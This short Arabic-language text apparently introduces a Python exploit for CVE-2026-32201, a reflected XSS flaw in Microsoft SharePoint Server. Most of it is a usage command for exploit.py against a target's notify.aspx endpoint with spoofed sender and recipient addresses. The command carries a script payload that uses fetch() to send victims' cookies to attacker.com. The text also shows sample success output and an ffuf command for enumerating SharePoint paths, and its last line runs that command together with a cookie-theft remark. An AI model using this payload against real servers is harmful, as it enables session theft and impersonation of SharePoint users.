
استغلال بلغة Python لثغرة CVE-2026-32201، وهي ثغرة XSS منعكسة في Microsoft SharePoint Server، تتيح انتحال الهوية وتعديل البيانات دون مصادقة عبر طلبات HTTP مصممة بعناية.
استغلال بايثون لـ CVE-2026-32201 - التحقق غير السليم من الإدخال في Microsoft SharePoint Server، مما يسمح بانتحال الشبكة دون مصادقة (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
مثال على المخرجات:
[+] تم اكتشاف SharePoint.
[*] إرسال طلب منتحل إلى https://target.com/_layouts/15/notify.aspx
[+] الحالة: 200
[+] نجاح محتمل: تحقق من سجلات/بريد الهدف بحثًا عن محتوى منتحل.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message لسرقة ملفات تعريف الارتباط